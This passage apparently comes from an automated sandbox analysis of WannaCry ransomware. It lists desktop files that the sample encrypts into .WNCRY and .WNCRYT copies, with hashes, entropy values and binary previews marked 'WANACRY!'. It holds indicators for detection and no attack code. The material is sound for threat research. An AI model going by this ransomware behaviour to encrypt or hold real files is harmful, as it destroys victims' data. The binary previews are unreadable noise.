Z.#O.?....U.Z.8..e...E..q{...>..J..."m...V~R9Ga|.....3.e..stt....z.V.Ve..Iv..Z.......|.....\....n5.l}a.)6..OO...b0a.:.*.*J..?..`t....XD..$....vH..}.(.X(..cZ.&7..{....A...%.?..z.|8.!."E'.c`.e4.>....u...$.TJK.I..F.b...p...hY2.iG.0.8.f$.W(....G..]..C.7).J..Y...kD.LeM<2....p....^>.{..aO.....O<8.\P.......ix.G.

                                C:\Users\user\Desktop\EFOYFBOLXA.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.7953074191376945
                                Encrypted:false
                                SSDEEP:24:QX+sjMfbLWxliy0FXncFeFohUnbRT6GHOoRFZGA:u+sozyxlmCeFoOntFX
                                MD5:BA278896F592DD6B57156511FDB44111
                                SHA1:0F94215CC2B26293D4F978DBE2028618A7A96892
                                SHA-256:B65B93C1892A937C4F8A322D032A297DFF24E94666E1A7663F6F4BF8A9ABDAB1
                                SHA-512:BC10FFCB587424CED3593594EACEFA2923411974F3375289A791E0E9E64B438DB645F3270F7A29707867D134BC1C2ADA28569FDDDF31DCD86B5129461ED1BC83
                                Malicious:false
                                Reputation:unknown
                                Preview:u.-..QU./.6S.U...(....Tq.:..u.Q()......(..D....g.I.O.{."l.....`..-.......#.`....@..xV/.`$..h..?..a.>.....+.......>R..~.)..b.s..xA.K..V.0..]....q..q.6.. `......E.[...n...\L.w.P{... .6'..(e.<o]<h.WO0.?.l.V.L9.g..i..%......Q.U..N.T.[...z!..;..0.......R...U.<.@...........".'".5.".l......0W..0(>....E.M.$...I.l.'....2..)....&4..lr.$~+gE...`..[.U..5q>..H..}.X....'..m.=&.se..&....j..1R2..Z.\..,4;...l../.<..@.....sIH...........r.Y-...0..\{z._..B9...N.0?..:*.LY..5.E...N'yn....,..p.2.9..<.8....."...+nOO..`+...~x6.\...-.A9..Kbgj....8....v)..g.M.....?!#8W..6lh.Ac{..........B....Y......M......=.n..'z&t...'.~....D.D-t9x+...}<}.\..:.YO.x..Y..sY..@.t.'...0l%"_.4..%fE..~p..V...UeU..Z9.lH.~..3.j...GP7....W1..`........=.w8.[T..3.r:..HG.......m..j....N..:..`..pz_Js...U.uB...=.8;...T..E..4.{1..<...\..&..Q)./B..c...!.G.:..d....j.V.t....O.g<.._}t.P#`9.HwV..;....Z..na..*....b.....<........\.Yo.(..]`..:..`....(L.,6R&QX."...j+X.x]qs....*|.....C..(X,.2A8..1P.!6.....

                                C:\Users\user\Desktop\EFOYFBOLXA.xlsx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.852894009710244
                                Encrypted:false
                                SSDEEP:24:bk/74lNEpa1E0qlWy1GIryE+eaH0kR+J4WLMFl5eC36rh4Hjty1Pg2HRex:bk/7a/1EjlWy1Gy9+/H9hWIPZKt4Hhs6
                                MD5:3575FCCAA8A66B9B0FB88D4CA5878C39
                                SHA1:002484501C9EC54B5AF137537E86158034F57637
                                SHA-256:884BB6358A2BB27612B662F45FFE4523DAE2D2F206F0BBB605213279723DDF78
                                SHA-512:3ADB2F4B7AB470A30F5B842BD72D4318A5CB6DC8F4F57F81452B8E4DB76E2076B93D5332B58C8D52CA5267EFAFF5040E21B713CC7989B7DBD4650FDAAA87495C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......w.f....:Q.....{..Y..Ig.._....9mV...........X.R..>.....a..>...k.T.ep...8~.Zj..P..........^su...h.O'..;..fD<...TT&F.v.....;.Ws.bU.{l..2.Qi.d..~<....V...8.fl.H.o.mI..>VI.$....T5W.Q.M/0'.}J..=...3r(,.....I.S....7BP$...L.^.f..c..Dk5!.Z.R<.q..TC/...............SP....1j.........?.........zO-.H.[.t..L.;).... .~3#....._...`L-[/.iG'..6..Sd..X$ox...x.w....L.=.....R[...-.E..s\.}......9W".... .R.\..}.............'pa.j..fv\6T......z...;.d~..D..>...\H..;..U....`0l.g~e......l..d5.j=>...H..P.[c..i....Z......q..Hr..'...v..eQ.:!Q.w.{Yr.7.gIQ...tQLse.....b...K....E.1..j...fi-.*cI.>.J.GV<..R'&.{.u......v.lk.....@.<;...{.|.. .e.....[..J..,BG.be.........T.lF..c.V.u..t....n,.0........`..).....j...S.f#pO<..D.I_ay[BH.wy...T.2....*77.........a..g..w.9.&..6.Q.....]..6.1{-a.dl..-<.z...R.s>...m'B.F.E........>8B..b$..q1..4.lsR$R...%Rlf.'=...E.....b.]..:a..bXk.5..(......Z........ZC..)n.LU.|.Tl.."..V....DA.0.=.....>.8. T(8.Xc%5._....t8.....+1.8Z...z"...G..o..h5.

                                C:\Users\user\Desktop\EFOYFBOLXA.xlsx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.852894009710244
                                Encrypted:false
                                SSDEEP:24:bk/74lNEpa1E0qlWy1GIryE+eaH0kR+J4WLMFl5eC36rh4Hjty1Pg2HRex:bk/7a/1EjlWy1Gy9+/H9hWIPZKt4Hhs6
                                MD5:3575FCCAA8A66B9B0FB88D4CA5878C39
                                SHA1:002484501C9EC54B5AF137537E86158034F57637
                                SHA-256:884BB6358A2BB27612B662F45FFE4523DAE2D2F206F0BBB605213279723DDF78
                                SHA-512:3ADB2F4B7AB470A30F5B842BD72D4318A5CB6DC8F4F57F81452B8E4DB76E2076B93D5332B58C8D52CA5267EFAFF5040E21B713CC7989B7DBD4650FDAAA87495C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......w.f....:Q.....{..Y..Ig.._....9mV...........X.R..>.....a..>...k.T.ep...8~.Zj..P..........^su...h.O'..;..fD<...TT&F.v.....;.Ws.bU.{l..2.Qi.d..~<....V...8.fl.H.o.mI..>VI.$....T5W.Q.M/0'.}J..=...3r(,.....I.S....7BP$...L.^.f..c..Dk5!.Z.R<.q..TC/...............SP....1j.........?.........zO-.H.[.t..L.;).... .~3#....._...`L-[/.iG'..6..Sd..X$ox...x.w....L.=.....R[...-.E..s\.}......9W".... .R.\..}.............'pa.j..fv\6T......z...;.d~..D..>...\H..;..U....`0l.g~e......l..d5.j=>...H..P.[c..i....Z......q..Hr..'...v..eQ.:!Q.w.{Yr.7.gIQ...tQLse.....b...K....E.1..j...fi-.*cI.>.J.GV<..R'&.{.u......v.lk.....@.<;...{.|.. .e.....[..J..,BG.be.........T.lF..c.V.u..t....n,.0........`..).....j...S.f#pO<..D.I_ay[BH.wy...T.2....*77.........a..g..w.9.&..6.Q.....]..6.1{-a.dl..-<.z...R.s>...m'B.F.E........>8B..b$..q1..4.lsR$R...%Rlf.'=...E.....b.]..:a..bXk.5..(......Z........ZC..)n.LU.|.Tl.."..V....DA.0.=.....>.8. T(8.Xc%5._....t8.....+1.8Z...z"...G..o..h5.

                                C:\Users\user\Desktop\GIGIYTFFYT.png

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.775590767587589
                                Encrypted:false
                                SSDEEP:24:faQaPQUxJDStDb7Iepqw9woqR/3ZwbQEuXwuj2ryPF9V:WdLDmDbkeprCoSvziu9L
                                MD5:A87FD8DC63F55618FFCCDDE740DCCB5B
                                SHA1:720165BD6DC7E996CD751DB371ED55735C3F8898
                                SHA-256:E6879535FFDE434E12FB115811E99A989A960576B924E54EA7C1C0B580E24172
                                SHA-512:5E7A1A3B9E756B53421756C4523DD6E1C86C8DD7024E80BD273B5BCC4BF75F0E56A7B0574DAB1CA70CF3E160E2BD8710E553B4BCB5757BAE1BEA831FDC509965
                                Malicious:false
                                Reputation:unknown
                                Preview:..12..~...%..#Mx...."-......R.E..i'..gv.....Q.....c.._.~C....-....0!.3..OH7U.5......Z....#.78...,sVZ(..!Xh.Q.......q.. zF..$x...W.0>..O.<.<+...y..".a.]q ...9.!.e...=....N..Y.D.g.k.3.a..F.).^.$!.~j....D.+....?#....I.z+.Z.....S)]5.U....l..x...1\.?...b..A.o..u.}.^bq.(.vN........;..U6.rOi.;..rK..v6....vW.z...w...9.<..4.q]_.....~I.<..O.#9D}..$..;.4&@.C.ox.......#9.:...X....:=...cba.T..b.H.."r/i:...T.k..M0..A....A....?.....l...u..N.P.,..C...+.....].I..{.J..,....3.5'... ....rN..Ie.Z....(...a..G:a/..?..E.Z....L.v.xvCE.S...&y...k9...m..it.]r.9.P...n.1.....#NO....cA..NG.M.=...4....vdj=(...|Le#....\.IYJ.p.....A...S.H'.u5(#T4M..0.bc...rL.......i.Ki.o......h..@X*...>...sl..k.3...9&...PD!.k...eKR..-....(#y.}k.ALi'.8..@$.....-..w...>.K..J..DG....6y-...P<0.....P.:...c..pm!U.(.*....h.e.......^...t......C..C....LI.@qvn..YT|..KVvM.<;.';....s..l.|..Ax..Y......aC&^o?..4o..F.>.zkX........T[.:R#(<b..A..e.^.?..\....%A...q...r...{..9..$0.O.3...x.|3.L

                                C:\Users\user\Desktop\GIGIYTFFYT.png.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.861977656314873
                                Encrypted:false
                                SSDEEP:24:bkTl30jOsdiTP3aYZIibZLAuCPU00uXK3nv0G8lFXsYn+cElkJ4lU:bkTlkjhgpFP9uXsvGFcsElrU
                                MD5:15DBA1A0595A59D3238DD005AD92750C
                                SHA1:AB3AD6DB0D16EB6CC584E89C095A25385A09CCAC
                                SHA-256:1323D3AF25618D6828B1730F82612A2E72F1715FC3CA9BF67A6AC848D49379BF
                                SHA-512:18668B861B5F568AC3169B519ADE7689212379A0B444268C91328BAEA9BD3FC5F8568D551C325DCFBE2766CEDE949AB568B81EA38C380F74137EBCA05F887AAA
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....\.,_.....cm|....Id.^<...C....X.{e.".W.^.....G.8}.ke....=....(..e `.B36.{... =.E..Q.!..Ob.]W.bx.....R...W..}.IW.....|.........w.TS.0.N6!.5$....Q:...B5...a....Z........R.4.d. 5.....kL-....m Z...).c..".b)3.....~..]....*.fQ.W.3....x^.:.....fR.Z.....................N1'..8..A.K.A.{.z*m.N.+.C+...Y.>.9..f........o..E+..P..S..v.$..~.[n.#...j..M\n\s..(d1JyM...rz..+.. K.....#.)......5.....X;;..@tST+.N.M........XDU.H.......#..*.]_Lj...k...._.rl"i. ....~c....F..;..;`7.l@h.n..2M.L..Zx:..;4.:.....v..I.)..G......Mi!@...q2B4.i.g<?\......Q^z...Y.J..=.... x.#..Ezm....../.. ..G..$.....GQs5J...... .M,.K...bc..<f..f.G..............c.0G.T.......fy."..0....i.r..v......D[.`P.C..".kC..$.F.J.]..k.Kr..............Bo..g8j$%.3..%.=...IjIv.V.a.....Ag.\L~.$.j...7IN1..t}G^.(.4.....G.>Q.uTW...E.. ....).\....a....F...X.2`F<..amZB....b..*2.~..e......&.-.`.b....r..q.?.k^}.`.&5J..wD.[y.....%.$ Q..}P3Y...0.C.6.v......d.Gi.....L.......B...Y=.....U....X..b.L.@+..H.~.'..

                                C:\Users\user\Desktop\GIGIYTFFYT.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.861977656314873
                                Encrypted:false
                                SSDEEP:24:bkTl30jOsdiTP3aYZIibZLAuCPU00uXK3nv0G8lFXsYn+cElkJ4lU:bkTlkjhgpFP9uXsvGFcsElrU
                                MD5:15DBA1A0595A59D3238DD005AD92750C
                                SHA1:AB3AD6DB0D16EB6CC584E89C095A25385A09CCAC
                                SHA-256:1323D3AF25618D6828B1730F82612A2E72F1715FC3CA9BF67A6AC848D49379BF
                                SHA-512:18668B861B5F568AC3169B519ADE7689212379A0B444268C91328BAEA9BD3FC5F8568D551C325DCFBE2766CEDE949AB568B81EA38C380F74137EBCA05F887AAA
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....\.,_.....cm|....Id.^<...C....X.{e.".W.^.....G.8}.ke....=....(..e `.B36.{... =.E..Q.!..Ob.]W.bx.....R...W..}.IW.....|.........w.TS.0.N6!.5$....Q:...B5...a....Z........R.4.d. 5.....kL-....m Z...).c..".b)3.....~..]....*.fQ.W.3....x^.:.....fR.Z.....................N1'..8..A.K.A.{.z*m.N.+.C+...Y.>.9..f........o..E+..P..S..v.$..~.[n.#...j..M\n\s..(d1JyM...rz..+.. K.....#.)......5.....X;;..@tST+.N.M........XDU.H.......#..*.]_Lj...k...._.rl"i. ....~c....F..;..;`7.l@h.n..2M.L..Zx:..;4.:.....v..I.)..G......Mi!@...q2B4.i.g<?\......Q^z...Y.J..=.... x.#..Ezm....../.. ..G..$.....GQs5J...... .M,.K...bc..<f..f.G..............c.0G.T.......fy."..0....i.r..v......D[.`P.C..".kC..$.F.J.]..k.Kr..............Bo..g8j$%.3..%.=...IjIv.V.a.....Ag.\L~.$.j...7IN1..t}G^.(.4.....G.>Q.uTW...E.. ....).\....a....F...X.2`F<..amZB....b..*2.~..e......&.-.`.b....r..q.?.k^}.`.&5J..wD.[y.....%.$ Q..}P3Y...0.C.6.v......d.Gi.....L.......B...Y=.....U....X..b.L.@+..H.~.'..

                                C:\Users\user\Desktop\GLTYDMDUST.mp3

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.820509222168795
                                Encrypted:false
                                SSDEEP:24:39KzdSgr0wo86R0cM5fQ5YlNcn1rr+A8ISMcCX8PZ:3buwOcMq5mNcn1rqwSMcCX8x
                                MD5:5A6E07C6E3DD1EDFEB8547D83522E015
                                SHA1:4E28188EBE1AC8FB3E310CA41B498B424AF138B8
                                SHA-256:0FF075EC400A01D6B9EFE24C1A273E5243FF7C36FF27F5C7AD5C6FE63D132BF0
                                SHA-512:72DB5B1AB82A48135EF187C9C80D13A9ECC59705FCA39984A335AA62DA62E05B2E144710F3568D911E22D5C38A1268358D692954A81CF259F2027F6F5222A715
                                Malicious:false
                                Reputation:unknown
                                Preview:.AZ..k.E..L...n{.J....d.....[..|Ye._.^.......W|5..SW.Cq..=q[....X.g.s_E..~.....(b...A.<.F[....1.jgh;..1.{.I.....c]..q..p|....l.1p..gJ..K|.M)L82.".......,......"..$..]3F26..7.t.h.1....X..A.4.5.z.^.89Ob....(.?.o{.t.k.......-...%^.rc..c;..........D."t..G$......*...mu....y........G...,B..,h...:..w;.....L....e#.|w;.A....E....._l....0d....|.*.C...G...hh.$..R.[......&#....'.1:.......x2........|..A..5.65T....g...r.....X._T...b..0.E.1i..'....0......ef..c.I....{n.7...9WF...z.E.e.6..yp....M[.m*~....U)....0.r.....f`e../O.....w0>.e.v.nv......`......N..\=..V;z6...1(.....P...NB.V.bi~.JU.<.)9.&..._.Y.....R./.%.q..#.....c....jIt....R......I.W}0>.o...K-.....7....^...8......d.A..:..'gW..8_d.E8FL......n!.$.u.. .h..A@...)]!..S..f|......../h.D&.........".....M.."K........=...Mt......lJuG..-.qa...1L...+.....L..D^.(.j.E*...n..7q.....V.F6..c.2F.w....y..n....-.i....,..~.uot.....Cyr.G..'H$.g..0......{....U..H....;R....].`...#M...c......!.....S...G.../.=j...b.`...s...,

                                C:\Users\user\Desktop\GLTYDMDUST.mp3.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.84798486393852
                                Encrypted:false
                                SSDEEP:24:bk8DjUrCieru7h3urwK4ogzkZTs0j3SwFyECLnAdHQP14aJu93ymMPARzM:bk8DwCidVW4ogkAECUUdJY3yhoRA
                                MD5:731F66A59E24AC0D621688B11FCD2A81
                                SHA1:5CA649D120C01F7890C2F9D1091B94307F127989
                                SHA-256:FED43A396EF50C40E82678E15BA3B62E6EFFB26559CA1B2735A992764BA591B5
                                SHA-512:14059E29D8BA23EE9CD12F037B240787B4C51CEB75BD75C64377B7C7CD060349577BD2566E1497C8F5CB0EF302D5A407EA4C3B5FD2427EE7933498FC82C507D7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....-..jq..N...!........&F.u.{U.[..*..:.....;.j..kY.B..-$..........s..fQ.|9N.|....J..{...N...}.......^.... 4....r......e..cLx<..y[.......R;w...p..15l...D...K..:-.8...c.3u.._~_|=.P........./.........k}...lCg.8.Z"U...m....t2Q.....?....i...i...X6&..o............k:_..=.KH....^[..~.......8v.....\..}:D..=.~Z.......\9,.vn.^G.9OS..T....dI.x.G..N=...r..-.&.0.Y$.rmPB.)>c.qy4vO..zl.]...`.S....af.cj.$..#..j{.O...P....8.....&u$.hr...d.)a..P..Y..h.......#..*.....$.kQ....U.7.........A[.=...D2V....KlD....!..`...WL..$........h..Hc......0=+..%...$\.....h..*U...}..&b.;.5..0...+tO.U.0..D.M..2.r..N8.....bS.....T........K=..........o."#..2xc-...d.&..............2......;K.`P...;.S.,C_i;w$/.......M.FZ<........!\.\./r......bxH..1"..B...;0...o....%p.!?.wH.h...L.......`.r.ge...s!.vE.#..H.....K......SZ;....vD2+n.C7..3/.-.....6.y.....qv...O..f.X.t7S.f.....Q._E......<."...+..=.xh.'..i.u.f..mE}.....[1[......s$....F.P.t.6e....G.0!.y..m..=.$..........|/

                                C:\Users\user\Desktop\GLTYDMDUST.mp3.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.84798486393852
                                Encrypted:false
                                SSDEEP:24:bk8DjUrCieru7h3urwK4ogzkZTs0j3SwFyECLnAdHQP14aJu93ymMPARzM:bk8DwCidVW4ogkAECUUdJY3yhoRA
                                MD5:731F66A59E24AC0D621688B11FCD2A81
                                SHA1:5CA649D120C01F7890C2F9D1091B94307F127989
                                SHA-256:FED43A396EF50C40E82678E15BA3B62E6EFFB26559CA1B2735A992764BA591B5
                                SHA-512:14059E29D8BA23EE9CD12F037B240787B4C51CEB75BD75C64377B7C7CD060349577BD2566E1497C8F5CB0EF302D5A407EA4C3B5FD2427EE7933498FC82C507D7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....-..jq..N...!........&F.u.{U.[..*..:.....;.j..kY.B..-$..........s..fQ.|9N.|....J..{...N...}.......^.... 4....r......e..cLx<..y[.......R;w...p..15l...D...K..:-.8...c.3u.._~_|=.P........./.........k}...lCg.8.Z"U...m....t2Q.....?....i...i...X6&..o............k:_..=.KH....^[..~.......8v.....\..}:D..=.~Z.......\9,.vn.^G.9OS..T....dI.x.G..N=...r..-.&.0.Y$.rmPB.)>c.qy4vO..zl.]...`.S....af.cj.$..#..j{.O...P....8.....&u$.hr...d.)a..P..Y..h.......#..*.....$.kQ....U.7.........A[.=...D2V....KlD....!..`...WL..$........h..Hc......0=+..%...$\.....h..*U...}..&b.;.5..0...+tO.U.0..D.M..2.r..N8.....bS.....T........K=..........o."#..2xc-...d.&..............2......;K.`P...;.S.,C_i;w$/.......M.FZ<........!\.\./r......bxH..1"..B...;0...o....%p.!?.wH.h...L.......`.r.ge...s!.vE.#..H.....K......SZ;....vD2+n.C7..3/.-.....6.y.....qv...O..f.X.t7S.f.....Q._E......<."...+..=.xh.'..i.u.f..mE}.....[1[......s$....F.P.t.6e....G.0!.y..m..=.$..........|/

                                C:\Users\user\Desktop\JDDHMPCDUJ.mp3

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.830566393939644
                                Encrypted:false
                                SSDEEP:24:Nv8rKdYhXeAtJzwPLMmqWZMNyJoAD2XUHsFyp1IXLv+l:x6nhXRzzA8WZMNyv7Hkyp1YLv4
                                MD5:F34E56D59DCBCECCA58147D35B6F0416
                                SHA1:6BF0DF358E18DBBAC3E59351A0ECA82E514F5840
                                SHA-256:AD04F4971949C0A60EEEDB4B84829805DDE83A0736F0E35C46AC919C69EE8DBC
                                SHA-512:A8AAAC78E102B49EA3CA4886DDD5452BAFAA2940A372D7540AB425CA972DE29AE7079419BE06573D468437CBB449F64C9D64038EF12CE36219240018FEC825DD
                                Malicious:false
                                Reputation:unknown
                                Preview:.^....9..)..G......d9......<N..0:.v.......Q..U.?.\.tk.w|~).!..k.!.2s!...E..\(_d..P...l...l.`..M4u...._..]......p.k.hR......\...ndS...v^....Bz1.,E..$..aBh.p.UU.......p"'A.{...(...1.i(.k/..).[...^'.".]p.ve.9K.~.~C...n..;(......gFr....,.....G.u..pE.t..c.................&q...;.vu..*.<...@c..K.5..|\.e.........=.....n......6.O.....6U.......+...WN..K..{...J(.....-.x..%........=.H.....t..%..m....l.[...A....a.l.C.r........a..03E.t@p`.....f..{....r...MH}...A.w.6x..<.?9m.|.....4Q..=.c.w,.s.'(...N@7X.6j..qe.b.Vo.{t..+....D..+.......0....y.4q....2..`L:.4"..[.B.vj...$.C....rE..!Rl.[...j.....E..S...Zt.\..T..Yk..~#.....G...w&...l.=....i8..o...S>..Xm.K&..IPM4dl....4...7^.....z..&.}..bT.....=.'..}.]...~X.,..\.......zO......3.....%*...Z&...\duJ^...V....G.uqN.(.x".....TN.:.W".Yye.=g.O..M.6s)..>U..I. .Qg..)..Ou...nAZ:4...mx.-..*.u3+...}..5#.D.O(maz..s.@..D..?.z.........!Y...._.>...3p.-7.-....?t.Fv0P$.bi.{.2......J...Za.G.-Q..y.7J.O...!.b.#1.....1.-...i...u....

                                C:\Users\user\Desktop\JDDHMPCDUJ.mp3.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.852421999394759
                                Encrypted:false
                                SSDEEP:24:bkse+wdIBoWVvWGJW/4ZamTSoTSsvpiVxfN3zNtI3v+WfGsClzC5w+z6iHQNALfg:bkse+oIZ8oa5oTSOExFnI/+YGG5wsH25
                                MD5:B8EB9958A5A2471D0088BAE2C2EDFA36
                                SHA1:21272BB542FD31193C6B28B3FF9136FB33CF44AF
                                SHA-256:3B10E553707E7F9260C1474816DBDE1032179535701118992EE27C9AD42F5B0B
                                SHA-512:7081BFDF575B6F3ECB2476F5159F00051CD506B54B7A10689378EA62074DE8E073757D05246B577929A85C4CA165004E20A9F94ED175EB4E48B2B01564C31F34
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......:o#.<.Z.-dD.sDV..E.wy..7.O...BqU..F,..-{A._.,{F@-.N...E.N..F.W.....U3...M..E......r..n...g..i.i.h.i.n...(V.a..;.$.....T.....z%...TP:.%...E..^.<.)'.l..._C..N.....U..r.....7.Z.u..8...*~../...tf..../.s..u....nzq.T.2N....y,.`.S*h.MmC$...y..KJ................W.=T....W..7..$.V...t.!3....?cYr+..Z$.Y..cMhj..T.k...2=./.45.Z..e......m^.R.C.\..l7.]..../I.."..w.+.......).$dk-=I.c..Z.F..b.H..m....+15..V0......D[....%..\.0.>}....[.Q.......S.kw...-...w...7.|.B{..........G..;.........]..u...8.4...@....\..ir&.&....K...;M....G..*...n..9..7.j.:.o.a.F8...V.sK..@..,N|.d.iK....|._+..KQ...g._j..rB.d..H.^..k.n..^..'ui[...!..a.lR... ./..yE...-.@.pc;.,Z.B.U....K.T3+...E].%............#.......0..6...Q.........J0..K..9......@.a.I]...F....X...U.4.5....jT...7..E..cW.&O..?.u,...-....,....17...%....R.w.z...Sr...L<5........y.7.X..P.#..C...._.j......oy...=.{.U..=X.....#.8>..~......:.....a..8CI...6.1d.u.K.S5...r4.l6Z...J~...p..}p.M....L...C..*+WRuU.._q.b.j.

                                C:\Users\user\Desktop\JDDHMPCDUJ.mp3.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.852421999394759
                                Encrypted:false
                                SSDEEP:24:bkse+wdIBoWVvWGJW/4ZamTSoTSsvpiVxfN3zNtI3v+WfGsClzC5w+z6iHQNALfg:bkse+oIZ8oa5oTSOExFnI/+YGG5wsH25
                                MD5:B8EB9958A5A2471D0088BAE2C2EDFA36
                                SHA1:21272BB542FD31193C6B28B3FF9136FB33CF44AF
                                SHA-256:3B10E553707E7F9260C1474816DBDE1032179535701118992EE27C9AD42F5B0B
                                SHA-512:7081BFDF575B6F3ECB2476F5159F00051CD506B54B7A10689378EA62074DE8E073757D05246B577929A85C4CA165004E20A9F94ED175EB4E48B2B01564C31F34
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......:o#.<.Z.-dD.sDV..E.wy..7.O...BqU..F,..-{A._.,{F@-.N...E.N..F.W.....U3...M..E......r..n...g..i.i.h.i.n...(V.a..;.$.....T.....z%...TP:.%...E..^.<.)'.l..._C..N.....U..r.....7.Z.u..8...*~../...tf..../.s..u....nzq.T.2N....y,.`.S*h.MmC$...y..KJ................W.=T....W..7..$.V...t.!3....?cYr+..Z$.Y..cMhj..T.k...2=./.45.Z..e......m^.R.C.\..l7.]..../I.."..w.+.......).$dk-=I.c..Z.F..b.H..m....+15..V0......D[....%..\.0.>}....[.Q.......S.kw...-...w...7.|.B{..........G..;.........]..u...8.4...@....\..ir&.&....K...;M....G..*...n..9..7.j.:.o.a.F8...V.sK..@..,N|.d.iK....|._+..KQ...g._j..rB.d..H.^..k.n..^..'ui[...!..a.lR... ./..yE...-.@.pc;.,Z.B.U....K.T3+...E].%............#.......0..6...Q.........J0..K..9......@.a.I]...F....X...U.4.5....jT...7..E..cW.&O..?.u,...-....,....17...%....R.w.z...Sr...L<5........y.7.X..P.#..C...._.j......oy...=.{.U..=X.....#.8>..~......:.....a..8CI...6.1d.u.K.S5...r4.l6Z...J~...p..}p.M....L...C..*+WRuU.._q.b.j.

                                C:\Users\user\Desktop\KLIZUSIQEN.jpg

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.816065791627852
                                Encrypted:false
                                SSDEEP:24:XA/QelHQdzx7sNJMHdzY3ACH7mfWfi/TYr5WBcC+sgx4iqINeW8Tt:lelHQd14DtwCyefcMWJtgjNb0t
                                MD5:BF4C2365BB9FBCD1162E1EC258549B0C
                                SHA1:561D6664F94B1297EB4F006EBD2AE32E357B3B25
                                SHA-256:B73EDB43F6A87BF019147BAAEF3EE4EFAD7ADD9EA407D3C8E86C958D9FC2C6D5
                                SHA-512:07E49F772AF37F485224C6A796F6777638DEBDF07C943D989CA860256305757A52EC58CF665EC382175C55C2A95EB55B0C3CD8C53EF37A8323A38A5C0FC6B50D
                                Malicious:false
                                Reputation:unknown
                                Preview:....6.w...5..l._.".._...HP>e.8.k...3.7.HQ.......xf....XAH&....9.[J.j.w....[O...M....v.5..jx......>.53..c....;...5pz.P.D.a...nu.,....N.j....HRK...x.}3..k...~t......@.=.0.Z...$?$....uc.XJd;Y..1...I?............H.......L%n...X.y...K....{s...d.~:A...c.zh..........0.......W....8."..z...2.@QrA^.u..g...]..G:.6..1.$&,......8.yBN.....~.7..i...y....`q.Q%raE.._`;f...9.........3&....Z..)....q\..,.w........u".V...gac..Z.C../.h..ud..C.p.w....0...GI|.7yjt.....n...8BI.}+.u..T. ..KE.......L^..PeS.C;.AF.Y.....-.h&.....-..6,.Z.!..].x;../...f.$..U....^.}.^..K..1.#)Y.8b"gnF..X7.<...g..[.).......Q@.AiC..a..W.sy.Y..'...k..1..\W.2.V..+4u.C.J...f.6h.@QI.a.-u...ODo..8.s.e.... ..8...q...c..?.r.vl&.b....E.y1j......w)U...o>]et.....8....M6...5.....>.V..S. .....I8.......u.j..'.......9z@.g.i....rP:.H*[..xgn..Mo..e.....s;n#~9...J.?.@.A.u.?.|w....{.2.W...6$.L......f3wR[aQ.d..> ..2.].).\...1:-.g4OO..7...c%.Y..F@..F.5n.U.f..D:......9..E`5ltic~....$.F.3."Xh.pO....y..

                                C:\Users\user\Desktop\KLIZUSIQEN.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8513655148042405
                                Encrypted:false
                                SSDEEP:24:bkVAplgZkxMWd1FCVuVQLDKlXEmfx4CyOptAY/FcOHMYUtqll7XzqYJ4HT0fwxXp:bkAlJxMaPCilJx4ZOpmwcYiqlNzqaoY+
                                MD5:29103ADBB9F0BC61F9D18503A697F59C
                                SHA1:59EF2D4079378F54E0760B916ADBF35D37208D94
                                SHA-256:299EF53E107792794618C4E380107FF1A45EA52CFABBCCD88F937876959A523B
                                SHA-512:710DD51A1727D24BDF7E29A453CABDE874CE67686CD3CB88FEDB4A9772C2A96D7C5648056AF09214BB76B13F5E5C836052AC825FB28AAEA8001085F469F9F030
                                Malicious:false
                                Reputation:unknown
